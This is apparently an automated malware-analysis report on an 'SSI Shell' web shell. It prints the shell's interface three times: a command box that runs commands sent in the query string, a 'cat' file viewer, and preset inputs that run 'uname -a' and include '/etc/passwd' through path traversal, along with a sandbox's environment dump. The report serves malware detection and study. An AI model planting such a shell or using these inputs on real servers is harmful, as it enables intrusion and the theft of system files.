PHP Malware Analysis
ssi.shtml
md5: fb3930871ff7c8bd542356e9a2e0bfad
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- you@example.com (Deobfuscated, HTML, Original)
Title
- SSI Shell (Deobfuscated, HTML, Original)
URLs
- https://0x4u.blogspot.com (Deobfuscated, HTML, Original)
Deobfuscated PHP code
[Error in shell][Error in shell]<html><head><title>SSI Shell</title><script language="javascript">function fex(){document.location.href="ssi.shtml.35c265a7f297b25ea8114c30b248854b.bin?"+document.getElementById('command').value;}function vfile(){document.location.href="ssi.shtml.35c265a7f297b25ea8114c30b248854b.bin?cat "+document.getElementById('vfile').value;}</script></head><body bgcolor=#e4e0d8 alink=blue vlink=blue><div align=center width=100% border=0 style=background-color:#D4D0C8;><center><b><font size=+2><a href=https://0x4u.blogspot.com>SSI Shell</a></font></b></center></div><br><div align=left width=100% border=0 style=background-color:#D4D0C8;><center><b><font size=+1>Shell info</font></b></center><br><b><font color=blue>GMT date</font></b>: <b>söndag, 12-feb-2023 21:20:47 GMT</b><br><b><font color=blue>Local date</font></b>: <b>söndag, 12-feb-2023 22:20:47 CET</b><br><b><font color=blue>Document name</font></b>: <b>ssi.shtml.35c265a7f297b25ea8114c30b248854b.bin</b><br><b><font color=blue>Document URI</font></b>: <b>/phpScan/queue/ssi.shtml.35c265a7f297b25ea8114c30b248854b.bin</b><br><b><font color=blue>Last modified</font></b>: <b>tisdag, 07-feb-2023 20:18:08 CET</b><br><b><font color=blue>Owner</font></b>: <b>ben</b><br><br></div><br><div align=left width=100% border=0 style=background-color:#D4D0C8;><center><b><font size=+1>Server info</font></b></center><br><pre>UNIQUE_ID=Y-lYL-eLYLdCdWcN9fMFEgAAAAI
HTTP_HOST=10.0.2.2
HTTP_USER_AGENT=python-requests/2.25.1
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_ACCEPT=*/*
HTTP_CONNECTION=keep-alive
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
LD_LIBRARY_PATH=/opt/lampp/lib:/opt/lampp/lib
SERVER_SIGNATURE=
SERVER_SOFTWARE=Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/8.1.6 mod_perl/2.0.12 Perl/v5.34.1
SERVER_NAME=10.0.2.2
SERVER_ADDR=127.0.0.1
SERVER_PORT=80
REMOTE_ADDR=127.0.0.1
DOCUMENT_ROOT=/opt/lampp/htdocs
REQUEST_SCHEME=http
CONTEXT_PREFIX=
CONTEXT_DOCUMENT_ROOT=/opt/lampp/htdocs
SERVER_ADMIN=you@example.com
SCRIPT_FILENAME=/opt/lampp/htdocs/phpScan/queue/ssi.shtml.35c265a7f297b25ea8114c30b248854b.bin
REMOTE_PORT=35942
GATEWAY_INTERFACE=CGI/1.1
SERVER_PROTOCOL=HTTP/1.1
REQUEST_METHOD=GET
QUERY_STRING=
REQUEST_URI=/phpScan/queue/ssi.shtml.35c265a7f297b25ea8114c30b248854b.bin
SCRIPT_NAME=/phpScan/queue/ssi.shtml.35c265a7f297b25ea8114c30b248854b.bin
DATE_LOCAL=söndag, 12-feb-2023 22:20:47 CET
DATE_GMT=söndag, 12-feb-2023 21:20:47 GMT
LAST_MODIFIED=tisdag, 07-feb-2023 20:18:08 CET
DOCUMENT_URI=/phpScan/queue/ssi.shtml.35c265a7f297b25ea8114c30b248854b.bin
DOCUMENT_ARGS=
USER_NAME=ben
DOCUMENT_NAME=ssi.shtml.35c265a7f297b25ea8114c30b248854b.bin
zero=
shl=uname -a
inc=/../../../../../../../etc/passwd
</pre><br></div><br><div align=left width=100% border=0 style=background-color:#D4D0C8;><center><b><font size=+1>Command for shell & address for inclusion</font></b></center><br><b><font color=blue>Enter command/address</font></b>: <input type=text size=80 id=command> <input type=button value=Run onclick=fex();><br></div><br><div align=left width=100% border=0 style=background-color:#D4D0C8;><center><b><font size=+1>Shell</font></b></center><br><b><font color=blue>Executed command</font></b>: <b>uname -a</b><br><textarea bgcolor=#e4e0d8 cols=121 rows=15>Linux nexus 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
</textarea><br></div><br><div align=left width=100% border=0 style=background-color:#D4D0C8;><center><b><font size=+1>Operations on files</font></b></center><br><b><font color=blue>View file (cat)</font></b>: <input type=text size=80 id=vfile value=/opt/lampp/htdocs/phpScan/queue/ssi.shtml.35c265a7f297b25ea8114c30b248854b.bin> <input type=button value=Run onclick=vfile();><br><b><font color=blue>Included file</font></b>: <b>/../../../../../../../etc/passwd</b><br><textarea bgcolor=#e4e0d8 cols=121 rows=15>[Error in shell]</textarea><br></div></div></body></html>Execution traces
Generated HTML code
<html><head></head><body bgcolor="#e4e0d8" alink="blue" vlink="blue">[Error in shell][Error in shell]<title>SSI Shell</title><script language="javascript">function fex(){document.location.href="ssi.shtml.35c265a7f297b25ea8114c30b248854b.bin?"+document.getElementById('command').value;}function vfile(){document.location.href="ssi.shtml.35c265a7f297b25ea8114c30b248854b.bin?cat "+document.getElementById('vfile').value;}</script><div align="center" width="100%" border="0" style="background-color:#D4D0C8;"><center><b><font size="+2"><a href="https://0x4u.blogspot.com">SSI Shell</a></font></b></center></div><br><div align="left" width="100%" border="0" style="background-color:#D4D0C8;"><center><b><font size="+1">Shell info</font></b></center><br><b><font color="blue">GMT date</font></b>: <b>söndag, 12-feb-2023 21:20:47 GMT</b><br><b><font color="blue">Local date</font></b>: <b>söndag, 12-feb-2023 22:20:47 CET</b><br><b><font color="blue">Document name</font></b>: <b>ssi.shtml.35c265a7f297b25ea8114c30b248854b.bin</b><br><b><font color="blue">Document URI</font></b>: <b>/phpScan/queue/ssi.shtml.35c265a7f297b25ea8114c30b248854b.bin</b><br><b><font color="blue">Last modified</font></b>: <b>tisdag, 07-feb-2023 20:18:08 CET</b><br><b><font color="blue">Owner</font></b>: <b>ben</b><br><br></div><br><div align="left" width="100%" border="0" style="background-color:#D4D0C8;"><center><b><font size="+1">Server info</font></b></center><br><pre>UNIQUE_ID=Y-lYL-eLYLdCdWcN9fMFEgAAAAI
HTTP_HOST=10.0.2.2
HTTP_USER_AGENT=python-requests/2.25.1
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_ACCEPT=*/*
HTTP_CONNECTION=keep-alive
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
LD_LIBRARY_PATH=/opt/lampp/lib:/opt/lampp/lib
SERVER_SIGNATURE=
SERVER_SOFTWARE=Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/8.1.6 mod_perl/2.0.12 Perl/v5.34.1
SERVER_NAME=10.0.2.2
SERVER_ADDR=127.0.0.1
SERVER_PORT=80
REMOTE_ADDR=127.0.0.1
DOCUMENT_ROOT=/opt/lampp/htdocs
REQUEST_SCHEME=http
CONTEXT_PREFIX=
CONTEXT_DOCUMENT_ROOT=/opt/lampp/htdocs
SERVER_ADMIN=you@example.com
SCRIPT_FILENAME=/opt/lampp/htdocs/phpScan/queue/ssi.shtml.35c265a7f297b25ea8114c30b248854b.bin
REMOTE_PORT=35942
GATEWAY_INTERFACE=CGI/1.1
SERVER_PROTOCOL=HTTP/1.1
REQUEST_METHOD=GET
QUERY_STRING=
REQUEST_URI=/phpScan/queue/ssi.shtml.35c265a7f297b25ea8114c30b248854b.bin
SCRIPT_NAME=/phpScan/queue/ssi.shtml.35c265a7f297b25ea8114c30b248854b.bin
DATE_LOCAL=söndag, 12-feb-2023 22:20:47 CET
DATE_GMT=söndag, 12-feb-2023 21:20:47 GMT
LAST_MODIFIED=tisdag, 07-feb-2023 20:18:08 CET
DOCUMENT_URI=/phpScan/queue/ssi.shtml.35c265a7f297b25ea8114c30b248854b.bin
DOCUMENT_ARGS=
USER_NAME=ben
DOCUMENT_NAME=ssi.shtml.35c265a7f297b25ea8114c30b248854b.bin
zero=
shl=uname -a
inc=/../../../../../../../etc/passwd
</pre><br></div><br><div align="left" width="100%" border="0" style="background-color:#D4D0C8;"><center><b><font size="+1">Command for shell & address for inclusion</font></b></center><br><b><font color="blue">Enter command/address</font></b>: <input type="text" size="80" id="command"> <input type="button" value="Run" onclick="fex();"><br></div><br><div align="left" width="100%" border="0" style="background-color:#D4D0C8;"><center><b><font size="+1">Shell</font></b></center><br><b><font color="blue">Executed command</font></b>: <b>uname -a</b><br><textarea bgcolor="#e4e0d8" cols="121" rows="15">Linux nexus 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
</textarea><br></div><br><div align="left" width="100%" border="0" style="background-color:#D4D0C8;"><center><b><font size="+1">Operations on files</font></b></center><br><b><font color="blue">View file (cat)</font></b>: <input type="text" size="80" id="vfile" value="/opt/lampp/htdocs/phpScan/queue/ssi.shtml.35c265a7f297b25ea8114c30b248854b.bin"> <input type="button" value="Run" onclick="vfile();"><br><b><font color="blue">Included file</font></b>: <b>/../../../../../../../etc/passwd</b><br><textarea bgcolor="#e4e0d8" cols="121" rows="15">[Error in shell]</textarea><br></div></body></html>Original PHP code
[Error in shell][Error in shell]<html><head><title>SSI Shell</title><script language="javascript">function fex(){document.location.href="ssi.shtml.35c265a7f297b25ea8114c30b248854b.bin?"+document.getElementById('command').value;}function vfile(){document.location.href="ssi.shtml.35c265a7f297b25ea8114c30b248854b.bin?cat "+document.getElementById('vfile').value;}</script></head><body bgcolor=#e4e0d8 alink=blue vlink=blue><div align=center width=100% border=0 style=background-color:#D4D0C8;><center><b><font size=+2><a href=https://0x4u.blogspot.com>SSI Shell</a></font></b></center></div><br><div align=left width=100% border=0 style=background-color:#D4D0C8;><center><b><font size=+1>Shell info</font></b></center><br><b><font color=blue>GMT date</font></b>: <b>söndag, 12-feb-2023 21:20:47 GMT</b><br><b><font color=blue>Local date</font></b>: <b>söndag, 12-feb-2023 22:20:47 CET</b><br><b><font color=blue>Document name</font></b>: <b>ssi.shtml.35c265a7f297b25ea8114c30b248854b.bin</b><br><b><font color=blue>Document URI</font></b>: <b>/phpScan/queue/ssi.shtml.35c265a7f297b25ea8114c30b248854b.bin</b><br><b><font color=blue>Last modified</font></b>: <b>tisdag, 07-feb-2023 20:18:08 CET</b><br><b><font color=blue>Owner</font></b>: <b>ben</b><br><br></div><br><div align=left width=100% border=0 style=background-color:#D4D0C8;><center><b><font size=+1>Server info</font></b></center><br><pre>UNIQUE_ID=Y-lYL-eLYLdCdWcN9fMFEgAAAAI
HTTP_HOST=10.0.2.2
HTTP_USER_AGENT=python-requests/2.25.1
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_ACCEPT=*/*
HTTP_CONNECTION=keep-alive
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
LD_LIBRARY_PATH=/opt/lampp/lib:/opt/lampp/lib
SERVER_SIGNATURE=
SERVER_SOFTWARE=Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/8.1.6 mod_perl/2.0.12 Perl/v5.34.1
SERVER_NAME=10.0.2.2
SERVER_ADDR=127.0.0.1
SERVER_PORT=80
REMOTE_ADDR=127.0.0.1
DOCUMENT_ROOT=/opt/lampp/htdocs
REQUEST_SCHEME=http
CONTEXT_PREFIX=
CONTEXT_DOCUMENT_ROOT=/opt/lampp/htdocs
SERVER_ADMIN=you@example.com
SCRIPT_FILENAME=/opt/lampp/htdocs/phpScan/queue/ssi.shtml.35c265a7f297b25ea8114c30b248854b.bin
REMOTE_PORT=35942
GATEWAY_INTERFACE=CGI/1.1
SERVER_PROTOCOL=HTTP/1.1
REQUEST_METHOD=GET
QUERY_STRING=
REQUEST_URI=/phpScan/queue/ssi.shtml.35c265a7f297b25ea8114c30b248854b.bin
SCRIPT_NAME=/phpScan/queue/ssi.shtml.35c265a7f297b25ea8114c30b248854b.bin
DATE_LOCAL=söndag, 12-feb-2023 22:20:47 CET
DATE_GMT=söndag, 12-feb-2023 21:20:47 GMT
LAST_MODIFIED=tisdag, 07-feb-2023 20:18:08 CET
DOCUMENT_URI=/phpScan/queue/ssi.shtml.35c265a7f297b25ea8114c30b248854b.bin
DOCUMENT_ARGS=
USER_NAME=ben
DOCUMENT_NAME=ssi.shtml.35c265a7f297b25ea8114c30b248854b.bin
zero=
shl=uname -a
inc=/../../../../../../../etc/passwd
</pre><br></div><br><div align=left width=100% border=0 style=background-color:#D4D0C8;><center><b><font size=+1>Command for shell & address for inclusion</font></b></center><br><b><font color=blue>Enter command/address</font></b>: <input type=text size=80 id=command> <input type=button value=Run onclick=fex();><br></div><br><div align=left width=100% border=0 style=background-color:#D4D0C8;><center><b><font size=+1>Shell</font></b></center><br><b><font color=blue>Executed command</font></b>: <b>uname -a</b><br><textarea bgcolor=#e4e0d8 cols=121 rows=15>Linux nexus 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
</textarea><br></div><br><div align=left width=100% border=0 style=background-color:#D4D0C8;><center><b><font size=+1>Operations on files</font></b></center><br><b><font color=blue>View file (cat)</font></b>: <input type=text size=80 id=vfile value=/opt/lampp/htdocs/phpScan/queue/ssi.shtml.35c265a7f297b25ea8114c30b248854b.bin> <input type=button value=Run onclick=vfile();><br><b><font color=blue>Included file</font></b>: <b>/../../../../../../../etc/passwd</b><br><textarea bgcolor=#e4e0d8 cols=121 rows=15>[Error in shell]</textarea><br></div></div></body></html>